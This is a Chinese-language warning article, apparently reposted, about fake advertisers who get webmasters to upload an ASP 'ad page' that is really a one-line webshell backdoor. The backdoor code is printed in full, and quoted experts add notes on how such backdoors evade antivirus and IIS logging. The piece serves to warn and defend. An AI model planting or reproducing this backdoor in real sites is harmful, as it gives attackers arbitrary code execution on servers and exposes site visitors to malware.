近日,有一些不法份子利用少數站長貪小便宜的心里,在站長網站...
近日,有一些不法份子利用少數站長貪小便宜的心里,在站長網站空間上種植“一句話木馬”,從而獲取服務器權限實現大面積掛馬或釋放病毒,危害網站用戶,從中牟取暴利,
高度警惕:假買廣告真掛馬 切莫貪圖小利
。最近有不少站長在Chinaz論壇發貼和致電中國站長站反映和咨詢,有人聯系要在他們的網站上投放廣告,卻要求把廣告頁面,一個ASP文件放到他自己網站的目錄中,但從表面也看不出來有異常,源文件如下:
<%eval request("383")%>
正在裝載,請稍候...
請您選擇最快的站點
粵ICP備05121955號
然而問題就是在上段代碼中被標紅的地方,國內著名的服務器安全專家,前SWsoft(中國)高級工程師楊恒飛(coldstar)告訴我們:ASP腳本中eval 函數允許動態執行VBScript源代碼,也就是可以執行任何代碼段,只是可能返回結果不同而已,
電腦資料
《高度警惕:假買廣告真掛馬 切莫貪圖小利》(http://salifelink.com)。因為它會對里面的表達式進行求值,也就是會執行里面的表達式,如果里面的表達式是一個刻意構造的代碼的話,就會危害到服務器的安全。如果服務器安全設置不嚴謹的話,它可以利用這個寫入一個完整的ASP木馬,操作文件什么的都可以做了。另外動網論壇開發工程師焦崧源(雨·漫步)講到:基于C/S模式的“一句話木馬”使人想起了幾年前在安全界流行的“Execute Request("#")”,這種后門的好處就是體積小,隱蔽性高,殺毒軟件一般查殺不出來,而且還可以使用POST方式,IIS日志不會記錄。
因此提醒廣大站長:切莫貪圖小利而上當受騙,根據目前反饋的站長信息,這些不份分子一般通過新申請的QQ號與不懂技術的站長,尤其是運營下載網站的,以包月廣告形式要求把該頁面放置自己的網站空間。另外也警惕一下,更不要接受通過遠程調用的方式在自己網站放置對方廣告,以免對方隨時更換代碼進行掛馬操作。
小知識:Eval 函數
計算一個表達式的值并返回結果。
[result = ]Eval(expression)
參數
result
可選項。 是一個變量,用于接受返回的結果。如果未指定結果,應考慮使用 Execute 語句代替。
expression
必選項。可以是包含任何有效 VBScript. 表達式的字符串。
說明:在 VBScript. 中,x = y 可以有兩種解釋。第一種方式是賦值語句,將 y 的值賦予 x。第二種解釋是測試 x 和 y 是否相等。如果相等,result 為 True;否則 result 為 False。Eval 方法總是采用第二種解釋,而 Execute 語句總是采用第一種。